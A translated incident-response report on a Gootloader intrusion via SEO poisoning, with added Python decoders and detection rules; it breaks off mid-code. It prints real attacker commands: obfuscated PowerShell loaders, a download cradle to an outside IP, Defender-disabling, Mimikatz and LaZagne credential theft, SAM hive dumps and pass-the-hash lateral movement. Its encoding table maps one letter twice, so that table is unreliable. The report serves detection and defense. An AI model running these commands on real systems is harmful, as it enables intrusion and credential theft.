[DFIR Report translation] SEO Poisoning: A Gootloader Story
2023-05-22 11:59:37 Author: Desync InfoSec

Summary

In February of this year we observed an intrusion in which Gootloader (also known as GootKit) was used during the initial access stage.

The intrusion lasted two days and involved discovery, persistence, lateral movement, collection, defense evasion, credential access and command and control activity. In the final stage the attackers used RDP, WMI, Mimikatz, LaZagne, WMIExec and SharpHound to move laterally and gain access, and then used that access to view sensitive documents.

Gootloader is a multi-stage payload loader that Sophos disclosed in March 2021. The attackers use SEO techniques to push phishing sites hosting the malware to the top of search results; users open these sites and download and run the malware. For background on Gootloader, see:

The researchers behind the Twitter account @GootLoaderSites publish intelligence on many of the phishing sites together with the latest C2 addresses.

Technical Summary

This intrusion began when a user searched for the phrase “Olympus Plea Agreement?” and clicked the second result, which led to a malicious JavaScript file being downloaded and executed (see the Initial Access section for details). During execution, Gootloader used encoded PowerShell to load Cobalt Strike into memory, and used the registry together with a scheduled task for persistence.

Fifteen minutes after initial access, the attackers ran a PowerShell implementation of SharpHound (BloodHound) to enumerate the AD domain, and used a Cobalt Strike PowerShell payload to move laterally to another host. The attackers disabled Windows Defender and then ran a second Cobalt Strike payload that connected to a different C2 server. They then ran LaZagne to harvest all the passwords stored on the compromised host. On the beachhead host the attackers ran Mimikatz through PowerShell to steal system credentials.

Using the stolen credentials, the attackers logged in to other endpoints over RDP and executed Cobalt Strike payloads. They moved laterally using RDP and remote WMI. After a four-hour pause in activity, the attackers enabled Restricted Admin mode on the domain controller via WMI and then logged in to it over RDP.

On the domain controller the attackers ran LaZagne again and obtained a large number of credentials. We then saw them start hunting for file shares, browsing file contents one by one over RDP, and eventually locating legal and insurance related documents.

On the second and final day of the intrusion, the attackers ran Advanced IP Scanner from the domain controller through an RDP session. They also checked the file server and the backup server, looking for more sensitive data before leaving the network.

Timeline
01
Initial Access

The intrusion began when the user clicked on and executed the Gootloader malware. The video below shows how the victim came to run Gootloader as a result of the SEO poisoning.

https://youtu.be/IdR-tlv7w48

When the user double-clicked to open the zip file, the malicious JavaScript was executed.

02
Execution

Gootloader creates the following two registry values:

HKCU:\SOFTWARE\Microsoft\Phone\Username
HKCU:\SOFTWARE\Microsoft\Phone\Username0

The first is populated with the encoded Cobalt Strike payload; the second stores a .NET loader named powershell.dll.

After the registry values are created, the following PowerShell code is executed:

"powershell.exe" /c C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "/"e" NgAxA"DQANgA0ADkA"MgAxADEAOwB"zAGwAZQBlAHAAIAAtAHMAIAA4AD"MA"OwAkAG8AcABqAD0ARwBlAH"QA"LQBJAHQ"AZQBtAFAA"cg"B"vAHAAZQ"ByA"HQAeQ"Ag"AC0"AcABh"AH"QAaAAg"ACgAIg"BoAGsA"IgArACIAYwB1A"Do"AX"ABz"AG8"AZgA"iACsA"IgB0AH"c"AIgAr"ACIAY"QB"y"AGUAXABtAGkAYwAiA"CsAI"gB"yAG"8AcwAiAC"sA"IgB"v"AG"YAd"ABc"AFAAa"AB"vAG4AZQBcACIAKwBbAE"UAbgB2"AGkAc"gBv"AG4"A"bQBlAG4"AdA"B"dADo"AOgAo"ACIAdQBzA"GUAIgArAC"IAcgBuACIAK"wAiAGEAb"QBlACIAKQArA"C"IAM"AAi"AC"kAOwB"mAG8AcgAg"ACg"A"J"AB1AG8APQAw"ADs"AJAB1AG8AIAA"tAG"wAZQAgADc"A"N"gA"wADsA"JAB1AG8AK"wArA"CkAewBUAHIAeQ"B7A"CQA"b"QBwA"GQAKw"A9A"CQA"bwB"wAGo"ALgA"kAHU"AbwB9AEM"AY"QB"0A"GMAaAB7AH0AfQA7ACQAdQB"vAD0A"M"AA7AHc"AaAB"pAGwAZQAo"ACQAdAByAH"U"AZQApA"H"sAJAB1AG"8AKwA"r"A"DsAJABrAG8APQB"bAG"0AY"QB0AGgAX"QA6ADo"AK"AAi"AH"MAcQAiACs"AIgByAHQAI"g"ApACgAJ"AB1A"G8"AKQA"7A"GkA"ZgAoACQA"awBvACA"ALQB"lAHEAIAAxADAAM"A"AwACkAew"B"iAHIA"Z"Q"Bh"AGsAfQB9A"CQAeQB"sAD0AJABtAH"A"AZAAuAH"IAZQBwA"GwAY"QB"jA"GU"A"KAA"iACMAIgAsACQAawBv"ACk"AOwA"kAGsAagB"iAD"0AWwB"iA"HkA"dA"Bl"AFsA"XQBdA"DoAOgAo"ACIAb"gBlACIAKw"AiA"HcA"IgApACgAJAB5AGwA"L"gBM"AG"UA"bgBn"A"HQAaAAvADIAKQA7"AGYAbwB"yACg"A"JA"B"1A"G8A"P"QAwADsAJAB1AG"8"AIAAt"A"G"w"A"dAAgA"CQA"eQ"B"sAC4AT"ABlAG4AZwB0AG"gAOwAkAHUAb"wArAD"0A"MgA"pAH"s"AJABrAGoAY"gBbACQ"AdQBvAC8AMgBdAD0AWwBjAG8AbgB"2"AGUAcgB0A"F"0"A"OgA"6"ACgAIgBU"AG8AQg"AiACsA"IgB5AHQAZ"Q"AiACkAKA"AkAH"kAbAAuA"FM"Ad"QBiAHMA"dAB"yAGkAb"gBnACgAJAB1AG8"AL"AAy"A"CkA"LAAoADIAK"gA4AC"kAKQB9AFsA"cg"Bl"AGYAb"ABlAGM"AdA"BpAG8"AbgAuAGEAcw"BzAGUAbQBiA"GwAeQBd"ADo"AOgAoAC"IAT"ABv"AC"IA"K"wAiAGEA"Z"AA"i"AC"kAKA"A"kAGsAagB"iACkAO"wBbAE8AcA"Bl"AG4AXQA6"A"D"oA"KAAiAF"QAZQAiA"C"sAIgBzA"H"Q"AIgAp"A"Cg"AKQA7ADYA"MQA"xAD"gAOQA"4ADUAN"AA0AD"sA

The PowerShell code extracts the .NET loader from HKCU\SOFTWARE\Microsoft\Phone\Username0 and loads it into memory.

614649211; sleep -s 83; $opj=Get-ItemProperty -path ("hkcu:\software\microsoft\Phone\"+[Environment]::("username")+"0"); for ($uo=0;$uo -le 760;$uo++) { Try{$mpd+=$opj.$uo}Catch{} }; $uo=0; while($true) { $uo++;$ko=[math]::("sqrt")($uo); if($ko -eq 1000){break} } $yl=$mpd.replace("#",$ko); $kjb=[byte[]]::("new")($yl.Length/2); for($uo=0;$uo -lt $yl.Length;$uo+=2){ $kjb[$uo/2]=[convert]::("ToByte")($yl.Substring($uo,2),(2*8)) } [reflection.assembly]::("Load")($kjb); [Open]::("Test")(); 6118985

The PowerShell can be decoded with CyberChef. Once it has run, it invokes the .NET loader, which reads the contents of HKCU\SOFTWARE\Microsoft\Phone\Username, decodes the Cobalt Strike payload and loads it into memory.

The encoding used by the PowerShell code is simple: each letter corresponds to one hexadecimal character, or to three zeros.

q->000
v->0
w->1
r->2
t->3
y->4
u->5
i->6
o->7
p->8
s->9
q->A
h->B
j->C
k->D
l->E
z->F
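The two decoding steps described above (the -e argument with its scattered double quotes, and the registry-stored hex string with its '#' shorthand) can be reproduced outside PowerShell so that an analyst can recover the loader from a registry export without running anything. The following is an added example written for this translation, not code from the original report: the function names are the author's, and the registry values in SAMPLE_VALUES are constructed rather than taken from the intrusion.

```python
import base64
import re
from typing import Dict


def decode_encoded_command(argument: str) -> str:
    """Decode a PowerShell -e / -EncodedCommand argument (base64 of UTF-16LE).

    Gootloader scatters double quotes through the base64 (see the command
    above); PowerShell's parser discards them, so strip them before decoding.
    """
    cleaned = re.sub(r'["\s]', '', argument)
    return base64.b64decode(cleaned).decode('utf-16-le')


def reassemble_registry_chunks(values: Dict[str, str]) -> str:
    """Concatenate the numbered values 0..760 in the order the script reads them.

    The decoded script loops `for ($uo=0;$uo -le 760;$uo++) { Try{$mpd+=$opj.$uo}Catch{} }`,
    so a missing number is simply skipped.
    """
    return ''.join(values[str(i)] for i in range(761) if str(i) in values)


def decode_registry_stage(hex_text: str) -> bytes:
    """Apply the script's '#' substitution and hex-to-byte conversion.

    $ko ends up as 1000 (the loop stops when sqrt($uo) -eq 1000), every '#'
    is replaced by "1000", and each 2-character substring is converted with
    [convert]::ToByte(..., 16).
    """
    expanded = hex_text.replace('#', '1000')
    if len(expanded) % 2:
        raise ValueError('odd number of hex digits after expansion')
    return bytes.fromhex(expanded)


def is_pe_image(blob: bytes) -> bool:
    """The recovered .NET loader is a PE file, so it should start with 'MZ'."""
    return blob[:2] == b'MZ'


# Constructed sample registry values (not the real loader): values "0" and "1"
# hold plain hex, value "2" uses the '#' shorthand, value "3" is absent on purpose.
SAMPLE_VALUES = {'0': '4d5a', '1': '90', '2': '#', '4': 'ff'}


if __name__ == '__main__':
    # Prefix of the real -e argument shown above, stray quotes included.
    print(decode_encoded_command('NgAxA"DQANgA0ADkA"MgAxADEAOwB"zAGwA'))
    blob = decode_registry_stage(reassemble_registry_chunks(SAMPLE_VALUES))
    print(blob, is_pe_image(blob))
```

On a real system the values would come from a `reg export` of HKCU\SOFTWARE\Microsoft\Phone; the MZ check is a quick sanity test that the reassembly order was right before the blob is handed to a .NET decompiler.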

The figure below shows the core logic of the .NET loader.

The figure below shows the overall execution flow of Gootloader.

Microsoft provides a configuration option that blocks JavaScript and VBScript from launching downloaded executable content. After the malicious code finished executing, Cobalt Strike checked in and the attackers began accessing multiple compromised systems over RDP.

powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('hxxp://37.120.198.225:80/trio'))"
03
Persistence

Gootloader's JavaScript invokes the PowerShell code below.

The PowerShell code creates a scheduled task that runs, whenever the user logs on, the PowerShell code stored in the registry.

6876813;$a="NgAxADQANgA0ADkAMgAxADEAOwBzAGwAZQBlAHAAIAAtAHMAIAA4ADMAOwAkAG8AcABqAD0ARwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgAC0AcABhAHQAaAAgACgAIgBoAGsAIgArACIAYwB1ADoAXABzAG8AZgAiACsAIgB0AHcAIgArACIAYQByAGUAXABtAGkAYwAiACsAIgByAG8AcwAiACsAIgBvAGYAdABcAFAAaABvAG4AZQBcACIAKwBbAEUAbgB2AGkAcgBvAG4AbQBlAG4AdABdADoAOgAoACIAdQBzAGUAIgArACIAcgBuACIAKwAiAGEAbQBlACIAKQArACIAMAAiACkAOwBmAG8AcgAgACgAJAB1AG8APQAwADsAJAB1AG8AIAAtAGwAZQAgADcANgAwADsAJAB1AG8AKwArACkAewBUAHIAeQB7ACQAbQBwAGQAKwA9ACQAbwBwAGoALgAkAHUAbwB9AEMAYQB0AGMAaAB7AH0AfQA7ACQAdQBvAD0AMAA7AHcAaABpAGwAZQAoACQAdAByAHUAZQApAHsAJAB1AG8AKwArADsAJABrAG8APQBbAG0AYQB0AGgAXQA6ADoAKAAiAHMAcQAiACsAIgByAHQAIgApACgAJAB1AG8AKQA7AGkAZgAoACQAawBvACAALQBlAHEAIAAxADAAMAAwACkAewBiAHIAZQBhAGsAfQB9ACQAeQBsAD0AJABtAHAAZAAuAHIAZQBwAGwAYQBjAGUAKAAiACMAIgAsACQAawBvACkAOwAkAGsAagBiAD0AWwBiAHkAdABlAFsAXQBdADoAOgAoACIAbgBlACIAKwAiAHcAIgApACgAJAB5AGwALgBMAGUAbgBnAHQAaAAvADIAKQA7AGYAbwByACgAJAB1AG8APQAwADsAJAB1AG8AIAAtAGwAdAAgACQAeQBsAC4ATABlAG4AZwB0AGgAOwAkAHUAbwArAD0AMgApAHsAJABrAGoAYgBbACQAdQBvAC8AMgBdAD0AWwBjAG8AbgB2AGUAcgB0AF0AOgA6ACgAIgBUAG8AQgAiACsAIgB5AHQAZQAiACkAKAAkAHkAbAAuAFMAdQBiAHMAdAByAGkAbgBnACgAJAB1AG8ALAAyACkALAAoADIAKgA4ACkAKQB9AFsAcgBlAGYAbABlAGMAdABpAG8AbgAuAGEAcwBzAGUAbQBiAGwAeQBdADoAOgAoACIATABvACIAKwAiAGEAZAAiACkAKAAkAGsAagBiACkAOwBbAE8AcABlAG4AXQA6ADoAKAAiAFQAZQAiACsAIgBzAHQAIgApACgAKQA7ADYAMQAxADgAOQA4ADUANAA0ADsA";
$u=$env:USERNAME;Register-ScheduledTask $u -In (New-ScheduledTask -Ac (New-ScheduledTaskAction -E ([Diagnostics.Process]::GetCurrentProcess().MainModule.FileName) -Ar ("-w h -e "+$a)) -Tr (New-ScheduledTaskTrigger -AtL -U $u));
30687851

Decoded, it reads as follows:

6876813;
614649211;
$a = "614649211";
sleep -s 83;
$opj = Get-ItemProperty -path ("hkcu:\software\microsoft\Phone\" + [Environment]::("username") + "0");
for ($uo = 0; $uo -le 760; $uo++) {
  Try { $mpd += $opj.$uo } Catch {}
};
$uo = 0;
while ($true) {
  $uo++;
  $ko = [math]::("sqrt")($uo);
  if ($ko -eq 1000) { break }
}
$yl = $mpd.replace("#", $ko);
$kjb = [byte[]]::("new")($yl.Length / 2);
for ($uo = 0; $uo -lt $yl.Length; $uo += 2) {
  $kjb[$uo / 2] = [convert]::("ToByte")($yl.Substring($uo, 2), (2 * 8))
}
[reflection.assembly]::("Load")($kjb);
[Open]::("Test")();
611898544;
$u = $env:USERNAME;
Register-ScheduledTask $u -In (New-ScheduledTask -Ac (New-ScheduledTaskAction -E ([Diagnostics.Process]::GetCurrentProcess().MainModule.FileName) -Ar ("-w h -e " + $a)) -Tr (New-ScheduledTaskTrigger -AtL -U $u));
306878516;

The scheduled task's configuration file is shown below.
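The task XML itself is not reproduced on this page, but its shape follows directly from the script: a LogonTrigger for the current user and an Exec action that runs powershell.exe with "-w h -e <base64>". As an added example for this translation (not code from the original report), the audit below parses task XML exported from C:\Windows\System32\Tasks and flags exactly that combination, decoding the -e argument to check whether it reads HKCU\Software\Microsoft\Phone. Both sample task files are constructed by the author; the namespace URI is the one every Windows task XML file carries.

```python
import base64
import re
import xml.etree.ElementTree as ET
from typing import List, Optional

# Namespace used by every Windows scheduled-task XML file.
TASK_NS = {'t': 'http://schemas.microsoft.com/windows/2004/02/mit/task'}


def _encoded(ps: str) -> str:
    """Base64 of UTF-16LE text, i.e. the form powershell -e expects.
    Used only to build the constructed sample below."""
    return base64.b64encode(ps.encode('utf-16-le')).decode('ascii')


# Constructed sample modelled on the task the persistence script creates.
# Not the task file from the intrusion.
SUSPICIOUS_TASK_XML = r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers>
    <LogonTrigger>
      <Enabled>true</Enabled>
      <UserId>WORKSTATION\user</UserId>
    </LogonTrigger>
  </Triggers>
  <Actions Context="Author">
    <Exec>
      <Command>C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe</Command>
      <Arguments>-w h -e """ + _encoded(r'$p=Get-ItemProperty -path "hkcu:\software\microsoft\Phone\"') + r"""</Arguments>
    </Exec>
  </Actions>
</Task>"""

# Constructed benign task for comparison (a vendor updater on a calendar trigger).
BENIGN_TASK_XML = r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers>
    <CalendarTrigger><StartBoundary>2023-01-01T03:00:00</StartBoundary></CalendarTrigger>
  </Triggers>
  <Actions Context="Author">
    <Exec>
      <Command>C:\Program Files\ExampleVendor\updater.exe</Command>
      <Arguments>/silent</Arguments>
    </Exec>
  </Actions>
</Task>"""


def decode_encoded_arg(arguments: str) -> Optional[str]:
    """Return the decoded -e/-ec/-enc/-EncodedCommand payload, or None if absent."""
    m = re.search(r'(?i)(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)', arguments)
    if not m:
        return None
    return base64.b64decode(m.group(1)).decode('utf-16-le', errors='replace')


def audit_task(xml_text: str) -> List[str]:
    """Return a list of findings for one task XML document (empty means nothing notable)."""
    root = ET.fromstring(xml_text)
    findings: List[str] = []
    has_logon_trigger = bool(root.findall('.//t:Triggers/t:LogonTrigger', TASK_NS))
    for action in root.findall('.//t:Actions/t:Exec', TASK_NS):
        command = (action.findtext('t:Command', default='', namespaces=TASK_NS) or '').lower()
        arguments = action.findtext('t:Arguments', default='', namespaces=TASK_NS) or ''
        if 'powershell' not in command:
            continue
        if has_logon_trigger:
            findings.append('powershell action on a logon trigger')
        if re.search(r'(?i)(?:^|\s)-w(?:indowstyle)?\s+h(?:idden)?\b', arguments):
            findings.append('hidden window')
        decoded = decode_encoded_arg(arguments)
        if decoded is not None:
            findings.append('encoded command')
            if re.search(r'(?i)software\\microsoft\\phone', decoded):
                findings.append('reads HKCU\\Software\\Microsoft\\Phone')
    return findings


if __name__ == '__main__':
    print(audit_task(SUSPICIOUS_TASK_XML))
    print(audit_task(BENIGN_TASK_XML))
```

Exported task files on disk are UTF-16 with a BOM; read them with `open(path, encoding='utf-16')` and pass the resulting string to `audit_task`. The registry-path check is the Gootloader-specific signal; the first three findings apply to any encoded, hidden PowerShell logon task and are worth reviewing on their own.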

04
Defense Evasion

On multiple compromised hosts, the attackers deleted the Windows Defender scheduled tasks.


schtasks /delete /tn "\Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /f
schtasks /delete /tn "\Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /f
schtasks /delete /tn "\Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /f
schtasks /delete /tn "\Microsoft\Windows\Windows Defender\Windows Defender Verification" /f

In addition, the attackers used PowerShell to disable several of Microsoft Defender's built-in protections.

Set-MpPreference -DisableRealtimeMonitoring $true
Set-MpPreference -DisableArchiveScanning $true
Set-MpPreference -DisableBehaviorMonitoring $true
Set-MpPreference -DisableIOAVProtection $true
Set-MpPreference -DisableIntrusionPreventionSystem $true
Set-MpPreference -DisableScanningNetworkFiles $true
Set-MpPreference -MAPSReporting 0
Set-MpPreference -DisableCatchupFullScan $True
Set-MpPreference -DisableCatchupQuickScan $True
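Both forms of Defender tampering above leave a clean trace in process-creation telemetry (Sysmon event 1 or Windows event 4688 with command-line auditing). The following is an added example for this translation, not from the original report: two command-line rules that correspond to the schtasks deletions and the Set-MpPreference calls, run over a handful of constructed process events to show that the benign look-alikes (a /query instead of /delete, Get-MpPreference, re-enabling a feature with $false) do not fire.

```python
import re
from typing import Dict, List, Tuple

# Detection rules written from the commands shown above; each is a regex
# over the full process command line.
RULES: Dict[str, re.Pattern] = {
    'defender_task_deleted': re.compile(
        r'schtasks(?:\.exe)?\s+/delete\s+/tn\s+"?\\Microsoft\\Windows\\Windows Defender\\', re.I),
    'defender_feature_disabled': re.compile(
        r'Set-MpPreference\s+-(?:Disable\w+\s+\$true|MAPSReporting\s+0)\b', re.I),
}

# Constructed process-creation events: (host, user, image, command line).
# The first three mirror the tampering above; the last three are benign.
SAMPLE_EVENTS: List[Tuple[str, str, str, str]] = [
    ('WS01', 'CORP\\jdoe', 'C:\\Windows\\System32\\schtasks.exe',
     'schtasks /delete /tn "\\Microsoft\\Windows\\Windows Defender\\Windows Defender Scheduled Scan" /f'),
    ('WS01', 'CORP\\jdoe', 'C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe',
     'powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true'),
    ('WS01', 'CORP\\jdoe', 'C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe',
     'powershell.exe Set-MpPreference -MAPSReporting 0'),
    ('WS02', 'CORP\\svc_backup', 'C:\\Windows\\System32\\schtasks.exe',
     'schtasks /query /tn "\\Microsoft\\Windows\\Windows Defender\\Windows Defender Scheduled Scan"'),
    ('WS02', 'CORP\\admin', 'C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe',
     'powershell.exe Get-MpPreference'),
    ('WS02', 'CORP\\admin', 'C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe',
     'powershell.exe Set-MpPreference -DisableRealtimeMonitoring $false'),
]


def scan_events(events: List[Tuple[str, str, str, str]]) -> List[dict]:
    """Return one hit per (event, rule) pair that matched."""
    hits = []
    for host, user, image, cmdline in events:
        for name, pattern in RULES.items():
            if pattern.search(cmdline):
                hits.append({'host': host, 'user': user, 'image': image,
                             'rule': name, 'cmdline': cmdline})
    return hits


def rules_fired_by_host(events: List[Tuple[str, str, str, str]]) -> Dict[str, List[str]]:
    """Collapse hits to host -> sorted distinct rule names, for triage ordering:
    a host where both rules fired is the one to look at first."""
    by_host: Dict[str, set] = {}
    for hit in scan_events(events):
        by_host.setdefault(hit['host'], set()).add(hit['rule'])
    return {host: sorted(rules) for host, rules in by_host.items()}


if __name__ == '__main__':
    for hit in scan_events(SAMPLE_EVENTS):
        print(hit['host'], hit['rule'], hit['cmdline'])
    print(rules_fired_by_host(SAMPLE_EVENTS))
```

Keep the `$true` anchor in the second rule: Set-MpPreference is also how administrators turn features back on, so matching on the cmdlet name alone would page on remediation as well as on the attack.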

As in other intrusions, we observed the attackers loading the Cobalt Strike payload into memory via rundll32 on the beachhead host.

In the memory capture from the beachhead host, a memory region belonging to rundll32 was found with PAGE_EXECUTE_READWRITE protection and an MZ header.

During the intrusion we also observed the attackers using Cobalt Strike's default named pipes.

PipeName: \msagent_ld
PipeName: \1ea887

The attackers used doubly encoded PowerShell: the first layer was hex combined with XOR,

and the second layer was gzip-compressed data encoded in base64.

Decoding this script reveals that it is the publicly available WMIExec script, used to run remote WMI queries.

05
Credential Access

Gootloader loaded a malicious PowerShell script named “mi.ps1”.

Another XOR-encoded PowerShell command invokes mi.ps1:

powershell -nop -noni -ep bypass -w h -c ""$t=([type]'Convert');&([scriptblock]::Create(($t::(($t.GetMethods()|?{$_.Name-clike'F*g'}).Name)('NWYsOV90Zjxec3t0cmUxX3RlP0Z0c1J9eHR/ZTgqNWQsNWY/OTk5OTVmOD9BYl5ze3RyZT9cdGV5fnViOG0uajlYZXR8MUdwY3hwc310K044P0dwfWR0P19wfHQ8cn14enQ2VTt2Nmw4P19wfHQ4P1h/Z356dDk2eWVlYSs+PiAjJj8hPyE/ICskJiYhIj42OCo3OVVYQzFQfXhwYis+WDtJODk1ZDgqMVh8YX5jZTxcfnVkfXQxUitNRGJ0Y2JNaGRieXA/fH5ifXRoTVh/Z356dDxGXFhUaXRyP2FiICoxWH9nfnp0PEZcWFRpdHIxPEVwY3Z0ZTFCWVBDVCAxPFV+fHB4fzFhY354f2JkY3B/cnQ/fX5ycH0xPERidGN/cHx0MVh/YmVwfX10YzE8WXBieTF0IyF0KSByJHIhJ3JydyMpKSUmJXIkKSB3ICIlIyJzKDE8Un58fHB/dTEzYX5mdGNieXR9fT90aXQxX3RmPFhldHxBY35hdGNlaDE8QXBleTE2WVpdXCtNQmhiZXR8TVJkY2N0f2VSfn9lY359QnRlTVJ+f2Vjfn1NXWJwNjE8X3B8dDE2VXhicHN9dEN0YmVjeHJldHVQdXx4fzYxPEdwfWR0MSExPEFjfmF0Y2VoRWhhdDFVRl5DVTMxPGd0Y3N+YnQ=')|%{$_-bxor17}|%{[char]$_})-join''))""

This CyberChef recipe decodes the PowerShell above; the decoded content is “Invoke-Mimikatz”, a PowerShell implementation of Mimikatz that loads the Mimikatz DLL directly into memory.

$u=('http://127.0.0.1:22201/'|%{(IRM $_)});$u|&(GCM I*e-E*); Import-Module C:\Users\<redacted>\mi.ps1; Invoke-Mimikatz -ComputerName <redacted>
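The obfuscation layer in the command above is a fixed pattern: a base64 string, `-bxor 17` applied to every byte, then `[char]` and `-join`. It can be reversed mechanically from a process command line, which is useful when building a hunt over PowerShell logging rather than decoding one sample by hand in CyberChef. The following is an added example for this translation, not code from the original report; SAMPLE_CMDLINE is constructed in the shape of the command above and carries only the first twelve base64 characters of the real blob, and the token list is the author's choice.

```python
import base64
import re
from typing import List, Optional, Tuple


def xor_b64_decode(blob: str, key: int) -> str:
    """Reverse the ('<base64>')|%{$_ -bxor <key>}|%{[char]$_} layer."""
    data = base64.b64decode(blob)
    return ''.join(chr(b ^ key) for b in data)


def extract_xor_layer(cmdline: str) -> Optional[Tuple[str, int]]:
    """Pull the base64 blob and the XOR key out of a command line of the shape above."""
    m = re.search(r"\('([A-Za-z0-9+/=]{8,})'\)\s*\|\s*%\s*\{\s*\$_\s*-bxor\s*(\d+)\s*\}", cmdline)
    if not m:
        return None
    return m.group(1), int(m.group(2))


def deobfuscate(cmdline: str) -> Optional[str]:
    """Return the decoded script, or None if the command line has no such layer."""
    layer = extract_xor_layer(cmdline)
    if layer is None:
        return None
    blob, key = layer
    return xor_b64_decode(blob, key)


# Strings worth alerting on once the layer is removed (author's list).
SUSPICIOUS_TOKENS = ('Invoke-Mimikatz', 'Import-Module', 'Invoke-Expression', 'IEX ', 'IRM ')


def flag_tokens(script: str) -> List[str]:
    """Case-insensitive presence check, returned in SUSPICIOUS_TOKENS order."""
    lowered = script.lower()
    return [t for t in SUSPICIOUS_TOKENS if t.lower() in lowered]


# Constructed: same structure as the command above, truncated to the first
# twelve base64 characters of the blob it carried.
SAMPLE_CMDLINE = (
    "powershell -nop -noni -ep bypass -w h -c \"\"$t=([type]'Convert');"
    "&([scriptblock]::Create(($t::(($t.GetMethods()|?{$_.Name-clike'F*g'}).Name)"
    "('NWYsOV90Zjxe')|%{$_-bxor17}|%{[char]$_})-join''))\"\""
)


if __name__ == '__main__':
    print(extract_xor_layer(SAMPLE_CMDLINE))
    print(deobfuscate(SAMPLE_CMDLINE))
    print(flag_tokens('Import-Module C:\\Users\\x\\mi.ps1; Invoke-Mimikatz'))
```

The `F*g` wildcard in the command resolves to `FromBase64String` at run time, which is why the static regex keys on the `-bxor` pipeline rather than on the method name. Decoding the twelve-character prefix already yields `$w=(New-O`, the start of a `New-Object` download cradle, which is the point at which a hunt query would pivot to the Invoke-Mimikatz finding the report describes.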

PowerShell logging (event ID 4103) shows the attackers successfully reading credentials.

The attackers also used the credential-harvesting tool “LaZagne” (renamed ls.exe) with the “all” argument to steal credentials:

ls.exe all -oN -output C:\Users\REDACTED

This tool harvests credentials from browsers, LSA secrets, memory, KeePass, WinSCP, Remote Desktop, OpenVPN, Git and other programs, and stores them under c:\users\. When LaZagne is run with administrator privileges it can also read credentials stored in the registry.

On other compromised hosts the attackers ran the following commands:

cmd.exe /c "reg.exe save hklm\sam c:\users\REDACTED\appdata\local\temp\1\dznuxujzr"
cmd.exe /c "reg.exe save hklm\system c:\users\REDACTED\appdata\local\temp\1\mkffdg"
cmd.exe /c "reg.exe save hklm\security c:\users\REDACTED\appdata\local\temp\1\iszmqwmjemt"
06
Discovery

On the beachhead host, the attackers used the Cobalt Strike payload to invoke PowerShell and run SharpHound to enumerate the AD domain:

powershell -nop -exec bypass -EncodedCommand SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQAyADcALgAwAC4AMAAuADEAOgAxADAAMAA0ADkALwAnACkAOwAgAEkAbgB2AG8AawBlAC0AQgBsAG8AbwBkAEgAbwB1AG4AZAAgAC0AQwBvAGwAbABlAGMAdABpAG8AbgBNAGUAdABoAG8AZAAgAEEAbABsAA==

The attackers also ran a WMI query to discover the antivirus products installed on the host:

WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List

Before moving laterally to the domain controller, the attackers ran the following command against it:

powershell.exe ls C:\ > C:\file.txt

While accessing hosts over RDP, the attackers ran systeminfo through PowerShell on one of the hosts they pivoted to, in order to gather more information about it. On the last day, before leaving the network, they used Advanced IP Scanner to scan the entire network for the following open ports:

21,80,135,443,445,3389,8080,56133,58000,58157,58294,58682,60234,60461,64502

07
Lateral Movement

As in other intrusions, the attackers deployed Cobalt Strike payloads during lateral movement by creating Windows services.

The attackers transferred the Cobalt Strike executables across the network over SMB.

These executables were run through remote services, which is visible in Windows event ID 7045.

After deploying Cobalt Strike beacons, the attackers also used RDP to establish interactive sessions with various hosts on the network. A notable aspect of these sessions is that the threat actors authenticated using “Restricted Admin mode”.

Restricted Admin mode can be considered a double-edged sword: although it prevents credential theft, it also allows an attacker to perform pass-the-hash over RDP. In other words, once Restricted Admin mode is enabled, only the NTLM hash of the remote desktop user is needed to establish a valid RDP session; the plaintext password is not required. The attackers attempted to enable “Restricted Admin mode” using both Invoke-WMIExec and psexec:

psexec \\<redacted> -u <redacted>\<redacted> -p <redacted> reg add "hklm\system\currentcontrolset\control\lsa" /f /v DisableRestrictedAdmin /t REG_DWORD /d 0
powershell -nop -noni -ep bypass -w h -c "$u=('http://127.0.0.1:47961/'|%%{(IRM $_)});&(''.SubString.ToString()[67,72,64]-Join'')($u); Import-Module C:\Users\<redacted>\Invoke-WMIExec.ps1; Invoke-WMIExec -Target <redacted> -Domain <redacted> -Username <redacted> -Hash <redacted> -Command "powershell.exe New-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Lsa' -Name 'DisableRestrictedAdmin' -Value 0 -PropertyType DWORD" -verbose

Windows event ID 4624 logs that include the Restricted Admin Mode field record the successful use of Restricted Admin mode.
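Two artefacts make this technique visible: the registry change that turns the mode on (DisableRestrictedAdmin set to 0, as in both commands above) and the 4624 event itself, whose RestrictedAdminMode field reads "Yes" for a logon type 10 (RemoteInteractive) session authenticated this way. The following is an added example for this translation, not code from the original report: it checks process command lines for the registry change and filters 4624 EventData records for Restricted Admin RDP logons. The event records are constructed by the author; the field names are the ones Windows writes in 4624 EventData.

```python
import re
from typing import Dict, List, Tuple

# Matches both forms seen above: reg add ... /v DisableRestrictedAdmin ... /d 0
# and New-ItemProperty ... -Name 'DisableRestrictedAdmin' -Value 0.
ENABLE_RESTRICTED_ADMIN = re.compile(
    r'DisableRestrictedAdmin\b.*?(?:/d\s+0|-Value\s+0)\b', re.I | re.S)


def enables_restricted_admin(cmdline: str) -> bool:
    """True when the command line sets DisableRestrictedAdmin to 0 (mode enabled)."""
    return bool(ENABLE_RESTRICTED_ADMIN.search(cmdline))


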